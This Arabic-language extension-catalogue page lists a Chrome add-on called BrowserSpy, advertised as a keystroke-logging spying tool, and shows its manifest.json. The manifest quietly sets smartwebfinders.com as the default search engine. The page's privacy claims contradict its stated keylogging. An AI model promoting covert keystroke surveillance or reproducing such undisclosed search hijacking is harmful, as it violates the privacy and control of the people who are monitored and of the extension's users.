Top Spying tool : BrowserSpy

BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.

ما هو Top Spying tool : BrowserSpy؟

Top Spying tool : BrowserSpy هو إضافة Chrome تم تطويرها بواسطة tackker، والميزة الرئيسية لها هي "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.".

لقطات شاشة التمديد

screenshot

تحميل ملف CRX للإضافة Top Spying tool : BrowserSpy

قم بتنزيل ملفات الامتداد Top Spying tool : BrowserSpy بتنسيق crx ، وقم بتثبيت الامتدادات يدويًا في متصفح Chrome ، أو شارك ملفات crx مع الأصدقاء لتثبيت الامتدادات بسهولة.

تعليمات استخدام التمديد

                        BrowserSpy - The Best Spying Tool

BrowserSpy helps monitoring on browser activity and can also assist in spying activities. This extension records keystrokes on all websites. 

This extension does NOT collect any information
(all logged data stays put)                    

معلومات أساسية عن التمديد

الاسم Top Spying tool : BrowserSpy Top Spying tool : BrowserSpy
ID cenplbjdopjciamjdjiehflkhfjmklhm
عنوان URL الرسمي https://chromewebstore.google.com/detail/top-spying-tool-browsersp/cenplbjdopjciamjdjiehflkhfjmklhm
الوصف BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.
حجم الملف 213 KB
عدد التثبيتات 132
النسخة الحالية 0.9
آخر تحديث 2024-03-02
تاريخ النشر 2021-03-30
تقييم 4.50/5 مجموع تقييمات 2
المطور tackker
البريد الإلكتروني [email protected]
نوع الدفع free
عنوان صفحة سياسة الخصوصية https://tackker.com/privacy-policy
اللغات المدعومة en-US
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "manifest_version": 3,
    "name": "Top Spying tool : BrowserSpy",
    "description": "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.",
    "version": "0.9",
    "icons": {
        "128": "browser.png",
        "48": "browser.png",
        "16": "browser.png"
    },
    "action": [],
    "background": {
        "service_worker": "back.js",
        "type": "module"
    },
    "content_scripts": [
        {
            "matches": [
                ""
            ],
            "js": [
                "jquery-3.5.0.min.js",
                "content.js"
            ]
        }
    ],
    "chrome_settings_overrides": {
        "search_provider": {
            "name": "Smart",
            "keyword": "Smart",
            "search_url": "https:\/\/smartwebfinders.com\/?n=60&q={searchTerms}",
            "favicon_url": "https:\/\/smartwebfinders.com\/favicon.ico",
            "encoding": "UTF-8",
            "is_default": true
        }
    },
    "permissions": [
        "alarms",
        "tabs",
        "webRequest",
        "webNavigation",
        "scripting",
        "storage",
        "unlimitedStorage"
    ]
}